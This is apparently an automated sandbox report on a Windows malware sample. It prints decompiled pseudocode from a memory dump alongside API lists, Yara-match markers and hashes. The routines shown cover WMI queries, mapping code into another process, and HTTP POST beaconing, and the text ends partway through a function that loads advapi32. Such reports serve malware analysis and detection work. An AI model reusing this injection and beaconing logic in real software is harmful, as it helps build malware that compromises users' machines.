                                    					_t252 = 0;
                                    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                    					__eflags = _t178;
                                    					if(_t178 != 0) {
                                    						L52:
                                    						__imp__#6(_t324);
                                    						__imp__#6(_v52);
                                    						goto L53;
                                    					}
                                    					_t262 = _v32;
                                    					_v28 = 0;
                                    					_v20 = 0;
                                    					__eflags = _t262;
                                    					if(_t262 == 0) {
                                    						L49:
                                    						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                    						__eflags = _t252;
                                    						if(_t252 == 0) {
                                    							E000C861A( &_v36, 0);
                                    							_t320 = _v36;
                                    						} else {
                                    							 *(_t320 + 8) = _t252;
                                    							 *_t320 = E000C91E3(_v100);
                                    							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
                                    						}
                                    						goto L52;
                                    					} else {
                                    						goto L6;
                                    					}
                                    					while(1) {
                                    						L6:
                                    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                    						__eflags = _t186;
                                    						if(_t186 != 0) {
                                    							break;
                                    						}
                                    						_v16 = 0;
                                    						_v48 = 0;
                                    						_v12 = 0;
                                    						_v24 = 0;
                                    						__eflags = _v84;
                                    						if(_v84 == 0) {
                                    							break;
                                    						}
                                    						_t187 = _v28;
                                    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                    						__eflags = _t188;
                                    						if(_t188 >= 0) {
                                    							__imp__#20(_v24, 1,  &_v16);
                                    							__imp__#19(_v24, 1,  &_v48);
                                    							_t46 = _t320 + 0xc; // 0xc
                                    							_t253 = _t46;
                                    							_t327 = _t252 << 3;
                                    							_t47 = _t327 + 8; // 0x8
                                    							_t192 = E000C8698(_t327, _t47);
                                    							__eflags = _t192;
                                    							if(_t192 == 0) {
                                    								__imp__#16(_v24);
                                    								_t193 = _v28;
                                    								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                    								L46:
                                    								_t252 = _v20;
                                    								break;
                                    							}
                                    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
                                    							_t200 =  *_t253;
                                    							__eflags =  *(_t327 + _t200 + 4);
                                    							if( *(_t327 + _t200 + 4) == 0) {
                                    								_t136 = _t320 + 0xc; // 0xc
                                    								E000C861A(_t136, 0);
                                    								E000C861A( &_v36, 0);
                                    								__imp__#16(_v24);
                                    								_t205 = _v28;
                                    								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                    								_t320 = _v36;
                                    								goto L46;
                                    							}
                                    							_t207 = _v16;
                                    							while(1) {
                                    								_v12 = _t207;
                                    								__eflags = _t207 - _v48;
                                    								if(_t207 > _v48) {
                                    									break;
                                    								}
                                    								_v44 = _v44 & 0x00000000;
                                    								_t209 =  &_v12;
                                    								__imp__#25(_v24, _t209,  &_v44);
                                    								__eflags = _t209;
                                    								if(_t209 < 0) {
                                    									break;
                                    								}
                                    								_t212 = E000C91E3(_v44);
                                    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                    								_t213 = _v28;
                                    								_t281 =  *_t213;
                                    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                    								__eflags = _t214;
                                    								if(_t214 < 0) {
                                    									L39:
                                    									__imp__#6(_v44);
                                    									_t207 = _v12 + 1;
                                    									__eflags = _t207;
                                    									continue;
                                    								}
                                    								_v92 = E000C95E1(_t281, 0x250);
                                    								 *_t329 = 0x4cc;
                                    								_t217 = E000C95E1(_t281);
                                    								_t283 = _v80;
                                    								_v96 = _t217;
                                    								_t218 = _t283 & 0x0000ffff;
                                    								__eflags = _t218 - 0xb;
                                    								if(__eflags > 0) {
                                    									_t219 = _t218 - 0x10;
                                    									__eflags = _t219;
                                    									if(_t219 == 0) {
                                    										L35:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											L38:
                                    											E000C85D5( &_v92);
                                    											E000C85D5( &_v96);
                                    											__imp__#9( &_v80);
                                    											goto L39;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%d");
                                    										L37:
                                    										_push(0xc);
                                    										_push(_t289);
                                    										E000C9640();
                                    										_t329 = _t329 + 0x10;
                                    										goto L38;
                                    									}
                                    									_t230 = _t219 - 1;
                                    									__eflags = _t230;
                                    									if(_t230 == 0) {
                                    										L33:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											goto L38;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%u");
                                    										goto L37;
                                    									}
                                    									_t235 = _t230 - 1;
                                    									__eflags = _t235;
                                    									if(_t235 == 0) {
                                    										goto L33;
                                    									}
                                    									__eflags = _t235 == 1;
                                    									if(_t235 == 1) {
                                    										goto L33;
                                    									}
                                    									L28:
                                    									__eflags = _t283 & 0x00002000;
                                    									if((_t283 & 0x00002000) == 0) {
                                    										_v88 = E000C95E1(_t283, 0x219);
                                    										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                    										E000C85D5( &_v88);
                                    										_t329 = _t329 + 0x18;
                                    										_t298 =  &_v616;
                                    										L31:
                                    										_t242 = E000C91E3(_t298);
                                    										L32:
                                    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                    										goto L38;
                                    									}
                                    									_t242 = E000CDA20( &_v80);
                                    									goto L32;
                                    								}
                                    								if(__eflags == 0) {
                                    									__eflags = _v72 - 0xffff;
                                    									_t298 = L"TRUE";
                                    									if(_v72 != 0xffff) {
                                    										_t298 = L"FALSE";
                                    									}
                                    									goto L31;
                                    								}
                                    								_t243 = _t218 - 1;
                                    								__eflags = _t243;
                                    								if(_t243 == 0) {
                                    									goto L38;
                                    								}
                                    								_t244 = _t243 - 1;
                                    								__eflags = _t244;
                                    								if(_t244 == 0) {
                                    									goto L35;
                                    								}
                                    								_t245 = _t244 - 1;
                                    								__eflags = _t245;
                                    								if(_t245 == 0) {
                                    									goto L35;
                                    								}
                                    								__eflags = _t245 != 5;
                                    								if(_t245 != 5) {
                                    									goto L28;
                                    								}
                                    								_t298 = _v72;
                                    								goto L31;
                                    							}
                                    							__imp__#16(_v24);
                                    							_t210 = _v28;
                                    							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                    							_t252 = _v20;
                                    							L42:
                                    							_t262 = _v32;
                                    							_t252 = _t252 + 1;
                                    							_v20 = _t252;
                                    							__eflags = _t262;
                                    							if(_t262 != 0) {
                                    								continue;
                                    							}
                                    							L48:
                                    							_t324 = _v40;
                                    							goto L49;
                                    						}
                                    						_t247 = _v28;
                                    						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                    						goto L42;
                                    					}
                                    					_t262 = _v32;
                                    					goto L48;
                                    				} else {
                                    					E000C861A( &_v36, _t322);
                                    					_t320 = _v36;
                                    					goto L53;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
                                      • Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
                                      • Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
                                      • Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
                                      • Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
                                    • SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
                                    • SysFreeString.OLEAUT32(?), ref: 000CDF82
                                    • SysFreeString.OLEAUT32(?), ref: 000CDF8B
                                      • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                    • String ID: FALSE$TRUE
                                    • API String ID: 1290676130-1412513891
                                    • Opcode ID: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
                                    • Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
                                    • Opcode Fuzzy Hash: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
                                    • Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
                                    				signed int _v8;
                                    				char _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				struct HINSTANCE__* _v40;
                                    				char _v44;
                                    				char _v56;
                                    				char _v72;
                                    				struct _WNDCLASSEXA _v120;
                                    				intOrPtr _t69;
                                    				intOrPtr _t71;
                                    				intOrPtr _t75;
                                    				intOrPtr _t80;
                                    				intOrPtr _t92;
                                    				intOrPtr _t95;
                                    				intOrPtr _t96;
                                    				struct HWND__* _t106;
                                    				intOrPtr* _t113;
                                    				struct HINSTANCE__* _t116;
                                    				intOrPtr _t120;
                                    				intOrPtr _t126;
                                    				intOrPtr _t131;
                                    				intOrPtr _t134;
                                    				intOrPtr _t136;
                                    				intOrPtr _t139;
                                    				char _t140;
                                    				intOrPtr _t141;
                                    
                                    				_t69 =  *0xde688; // 0xf0000
                                    				_t126 = __ecx;
                                    				_t134 = __edx;
                                    				_t116 = 0;
                                    				_v36 = __edx;
                                    				_v16 = 0;
                                    				_v44 = 0;
                                    				_v40 = 0;
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				_v24 = 0;
                                    				_v20 = __ecx;
                                    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                    					E000CE23E(0x1f4);
                                    					_t116 = 0;
                                    				}
                                    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                    				_v28 = _t116;
                                    				if( *_t113 != 0x4550) {
                                    					L12:
                                    					if(_v8 != 0) {
                                    						_t75 =  *0xde780; // 0x0
                                    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                    						_v8 = _v8 & 0x00000000;
                                    					}
                                    					L14:
                                    					if(_v12 != 0) {
                                    						_t136 =  *0xde780; // 0x0
                                    						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                                    					}
                                    					if(_v16 != 0) {
                                    						_t71 =  *0xde780; // 0x0
                                    						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                                    					}
                                    					return _v8;
                                    				}
                                    				_push(_t116);
                                    				_push(0x8000000);
                                    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                    				_push(0x40);
                                    				_push( &_v44);
                                    				_push(_t116);
                                    				_push(0xe);
                                    				_push( &_v16);
                                    				_t80 =  *0xde780; // 0x0
                                    				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                                    					goto L12;
                                    				}
                                    				_v120.style = 0xb;
                                    				_v120.cbSize = 0x30;
                                    				_v120.lpszClassName =  &_v56;
                                    				asm("movsd");
                                    				_v120.lpfnWndProc = DefWindowProcA;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsb");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsw");
                                    				asm("movsb");
                                    				_v120.cbWndExtra = 0;
                                    				_v120.lpszMenuName = 0;
                                    				_v120.cbClsExtra = 0;
                                    				_v120.hInstance = 0;
                                    				if(RegisterClassExA( &_v120) != 0) {
                                    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                                    					if(_t106 != 0) {
                                    						DestroyWindow(_t106);
                                    						UnregisterClassA( &_v56, 0);
                                    					}
                                    				}
                                    				_t139 =  *0xde780; // 0x0
                                    				_push(0x40);
                                    				_push(0);
                                    				_push(2);
                                    				_push( &_v24);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v12);
                                    				_push(GetCurrentProcess());
                                    				_push(_v16);
                                    				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                                    					_t126 = _v20;
                                    					goto L12;
                                    				} else {
                                    					_push(0x40);
                                    					_push(0);
                                    					_push(2);
                                    					_push( &_v24);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_t126 = _v20;
                                    					_push( &_v8);
                                    					_t92 =  *0xde780; // 0x0
                                    					_push(_t126);
                                    					_push(_v16);
                                    					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                                    						goto L12;
                                    					}
                                    					_t140 = E000C8669( *0xde688, 0x1ac4);
                                    					_v32 = _t140;
                                    					if(_t140 == 0) {
                                    						goto L12;
                                    					}
                                    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                    					_t95 =  *0xde684; // 0x27bf8f0
                                    					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                                    					_t120 =  *0xde684; // 0x27bf8f0
                                    					_t131 = _t96;
                                    					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                    					E000C861A( &_v32, 0x1ac4);
                                    					_t141 =  *0xde688; // 0xf0000
                                    					 *0xde688 = _t131;
                                    					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                    					E000CC63F(_v12, _v8, _v36);
                                    					 *0xde688 = _t141;
                                    					goto L14;
                                    				}
                                    			}

                                    APIs
                                    • RegisterClassExA.USER32 ref: 000CC785
                                    • CreateWindowExA.USER32 ref: 000CC7B0
                                    • DestroyWindow.USER32 ref: 000CC7BB
                                    • UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB
                                      • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                                    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                    • API String ID: 3082384575-2319545179
                                    • Opcode ID: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
                                    • Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
                                    • Opcode Fuzzy Hash: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
                                    • Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                    				char _v8;
                                    				char _v16;
                                    				short _v144;
                                    				short _v664;
                                    				void* _t19;
                                    				struct HINSTANCE__* _t22;
                                    				long _t23;
                                    				long _t24;
                                    				char* _t27;
                                    				WCHAR* _t32;
                                    				long _t33;
                                    				intOrPtr _t37;
                                    				intOrPtr _t38;
                                    				void* _t49;
                                    				int _t53;
                                    				void* _t54;
                                    				intOrPtr* _t55;
                                    				void* _t57;
                                    
                                    				_t49 = __edx;
                                    				OutputDebugStringA("Hello qqq");
                                    				if(_a8 != 1) {
                                    					if(_a8 != 0) {
                                    						L12:
                                    						return 1;
                                    					}
                                    					SetLastError(0xaa);
                                    					L10:
                                    					return 0;
                                    				}
                                    				E000C85EF();
                                    				_t19 = E000C980C( &_v16);
                                    				_t57 = _t49;
                                    				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                    					goto L12;
                                    				} else {
                                    					E000C8F78();
                                    					GetModuleHandleA(0);
                                    					_t22 = _a4;
                                    					 *0xde69c = _t22;
                                    					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                    					_t24 = GetLastError();
                                    					if(_t23 != 0 && _t24 != 0x7a) {
                                    						memset( &_v144, 0, 0x80);
                                    						_t55 = _t54 + 0xc;
                                    						_t53 = 0;
                                    						do {
                                    							_t27 = E000C95C7(_t53);
                                    							_a8 = _t27;
                                    							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                    							E000C85C2( &_a8);
                                    							_t53 = _t53 + 1;
                                    						} while (_t53 < 0x2710);
                                    						E000D2A5B( *0xde69c);
                                    						 *_t55 = 0x7c3;
                                    						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
                                    						 *_t55 = 0xb4e;
                                    						_t32 = E000C95E1(0xdba28);
                                    						_a8 = _t32;
                                    						_t33 = GetFileAttributesW(_t32);
                                    						_push( &_a8);
                                    						if(_t33 == 0xffffffff) {
                                    							E000C85D5();
                                    							_v8 = 0;
                                    							_t37 =  *0xde684; // 0x27bf8f0
                                    							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
                                    							 *0xde6a8 = _t38;
                                    							if(_t38 == 0) {
                                    								goto L10;
                                    							}
                                    							goto L12;
                                    						}
                                    						E000C85D5();
                                    					}
                                    					goto L10;
                                    				}
                                    			}

                                    APIs
                                    • OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
                                    • SetLastError.KERNEL32(000000AA), ref: 000C60D7
                                      • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
                                      • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
                                    • GetLastError.KERNEL32 ref: 000C5FEF
                                    • memset.MSVCRT ref: 000C6013
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 000C6083
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
                                    • String ID: Hello qqq
                                    • API String ID: 3872149766-3610097158
                                    • Opcode ID: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
                                    • Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
                                    • Opcode Fuzzy Hash: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
                                    • Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                    				char _v8;
                                    				char _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				int _v76;
                                    				void* _v80;
                                    				intOrPtr _v100;
                                    				int _v104;
                                    				void* _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				char* _v120;
                                    				void _v124;
                                    				char _v140;
                                    				void _v396;
                                    				void _v652;
                                    				intOrPtr _t105;
                                    				intOrPtr _t113;
                                    				intOrPtr* _t115;
                                    				intOrPtr _t118;
                                    				intOrPtr _t121;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t131;
                                    				char _t133;
                                    				intOrPtr _t136;
                                    				char _t138;
                                    				char _t139;
                                    				intOrPtr _t141;
                                    				intOrPtr _t147;
                                    				intOrPtr _t154;
                                    				intOrPtr _t158;
                                    				intOrPtr _t162;
                                    				intOrPtr _t164;
                                    				intOrPtr _t166;
                                    				intOrPtr _t172;
                                    				intOrPtr _t176;
                                    				void* _t183;
                                    				void* _t185;
                                    				intOrPtr _t186;
                                    				char _t195;
                                    				intOrPtr _t203;
                                    				intOrPtr _t204;
                                    				signed int _t209;
                                    				void _t212;
                                    				intOrPtr _t213;
                                    				void* _t214;
                                    				intOrPtr _t216;
                                    				char _t217;
                                    				intOrPtr _t218;
                                    				signed int _t219;
                                    				signed int _t220;
                                    				void* _t221;
                                    
                                    				_v40 = _v40 & 0x00000000;
                                    				_v24 = 4;
                                    				_v36 = 1;
                                    				_t214 = __edx;
                                    				memset( &_v396, 0, 0x100);
                                    				memset( &_v652, 0, 0x100);
                                    				_v64 = E000C95C7(0x85b);
                                    				_v60 = E000C95C7(0xdc9);
                                    				_v56 = E000C95C7(0x65d);
                                    				_v52 = E000C95C7(0xdd3);
                                    				_t105 = E000C95C7(0xb74);
                                    				_v44 = _v44 & 0;
                                    				_t212 = 0x3c;
                                    				_v48 = _t105;
                                    				memset( &_v124, 0, 0x100);
                                    				_v116 = 0x10;
                                    				_v120 =  &_v140;
                                    				_v124 = _t212;
                                    				_v108 =  &_v396;
                                    				_v104 = 0x100;
                                    				_v80 =  &_v652;
                                    				_push( &_v124);
                                    				_push(0);
                                    				_v76 = 0x100;
                                    				_push(E000CC379(_t214));
                                    				_t113 =  *0xde6a4; // 0x2630798
                                    				_push(_t214);
                                    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                    					_t209 = 0;
                                    					_v20 = 0;
                                    					do {
                                    						_t115 =  *0xde6a4; // 0x2630798
                                    						_v12 = 0x8404f700;
                                    						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                    						if(_t213 != 0) {
                                    							_t195 = 3;
                                    							_t185 = 4;
                                    							_v8 = _t195;
                                    							_t118 =  *0xde6a4; // 0x2630798
                                    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                    							_v8 = 0x3a98;
                                    							_t121 =  *0xde6a4; // 0x2630798
                                    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t124 =  *0xde6a4; // 0x2630798
                                    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t127 =  *0xde6a4; // 0x2630798
                                    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                    							_t131 =  *0xde6a4; // 0x2630798
                                    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                    							if(_a24 != 0) {
                                    								E000C980C(_a24);
                                    							}
                                    							if(_t186 != 0) {
                                    								_t133 = 0x8484f700;
                                    								if(_v112 != 4) {
                                    									_t133 = _v12;
                                    								}
                                    								_t136 =  *0xde6a4; // 0x2630798
                                    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                    								_v8 = _t216;
                                    								if(_a24 != 0) {
                                    									E000C980C(_a24);
                                    								}
                                    								if(_t216 != 0) {
                                    									_t138 = 4;
                                    									if(_v112 != _t138) {
                                    										L19:
                                    										_t139 = E000C95C7(0x777);
                                    										_t217 = _t139;
                                    										_v12 = _t217;
                                    										_t141 =  *0xde6a4; // 0x2630798
                                    										_t218 = _v8;
                                    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
                                    										E000C85C2( &_v12);
                                    										if(_a24 != 0) {
                                    											E000C980C(_a24);
                                    										}
                                    										if(_v28 != 0) {
                                    											L28:
                                    											_v24 = 8;
                                    											_push(0);
                                    											_v32 = 0;
                                    											_v28 = 0;
                                    											_push( &_v24);
                                    											_push( &_v32);
                                    											_t147 =  *0xde6a4; // 0x2630798
                                    											_push(0x13);
                                    											_push(_t218);
                                    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                    												_t219 = E000C9749( &_v32);
                                    												if(_t219 == 0xc8) {
                                    													 *_a20 = _v8;
                                    													 *_a12 = _t213;
                                    													 *_a16 = _t186;
                                    													return 0;
                                    												}
                                    												_t220 =  ~_t219;
                                    												L32:
                                    												_t154 =  *0xde6a4; // 0x2630798
                                    												 *((intOrPtr*)(_t154 + 8))(_v8);
                                    												L33:
                                    												if(_t186 != 0) {
                                    													_t158 =  *0xde6a4; // 0x2630798
                                    													 *((intOrPtr*)(_t158 + 8))(_t186);
                                    												}
                                    												if(_t213 != 0) {
                                    													_t203 =  *0xde6a4; // 0x2630798
                                    													 *((intOrPtr*)(_t203 + 8))(_t213);
                                    												}
                                    												return _t220;
                                    											}
                                    											GetLastError();
                                    											_t220 = 0xfffffff8;
                                    											goto L32;
                                    										} else {
                                    											GetLastError();
                                    											_t162 =  *0xde6a4; // 0x2630798
                                    											 *((intOrPtr*)(_t162 + 8))(_t218);
                                    											_t218 = 0;
                                    											goto L23;
                                    										}
                                    									}
                                    									_v12 = _t138;
                                    									_push( &_v12);
                                    									_push( &_v16);
                                    									_t172 =  *0xde6a4; // 0x2630798
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                    										L18:
                                    										GetLastError();
                                    										goto L19;
                                    									}
                                    									_v16 = _v16 | 0x00003380;
                                    									_push(4);
                                    									_push( &_v16);
                                    									_t176 =  *0xde6a4; // 0x2630798
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                    										goto L19;
                                    									}
                                    									goto L18;
                                    								} else {
                                    									GetLastError();
                                    									L23:
                                    									_t164 =  *0xde6a4; // 0x2630798
                                    									 *((intOrPtr*)(_t164 + 8))(_t186);
                                    									_t186 = 0;
                                    									goto L24;
                                    								}
                                    							} else {
                                    								GetLastError();
                                    								L24:
                                    								_t166 =  *0xde6a4; // 0x2630798
                                    								 *((intOrPtr*)(_t166 + 8))(_t213);
                                    								_t213 = 0;
                                    								goto L25;
                                    							}
                                    						}
                                    						GetLastError();
                                    						L25:
                                    						_t204 = _t218;
                                    						_t209 = _v20 + 1;
                                    						_v20 = _t209;
                                    					} while (_t209 < 2);
                                    					_v8 = _t218;
                                    					if(_t204 != 0) {
                                    						goto L28;
                                    					}
                                    					_t220 = 0xfffffffe;
                                    					goto L33;
                                    				}
                                    				_t183 = 0xfffffffc;
                                    				return _t183;
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: memset$ErrorLast
                                    • String ID: POST
                                    • API String ID: 2570506013-1814004025
                                    • Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
                                    • Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
                                    • Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
                                    • Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E000D16B8(signed int* _a4) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				_Unknown_base(*)()* _v16;
                                    				char _v20;
                                    				_Unknown_base(*)()* _t16;
                                    				_Unknown_base(*)()* _t17;
                                    				void* _t22;
                                    				intOrPtr* _t28;
                                    				signed int _t29;
                                    				signed int _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t34;
                                    
                                    				_t30 = 0;
                                    				_v8 = 0;
                                    				_t32 = GetModuleHandleA("advapi32.dll");
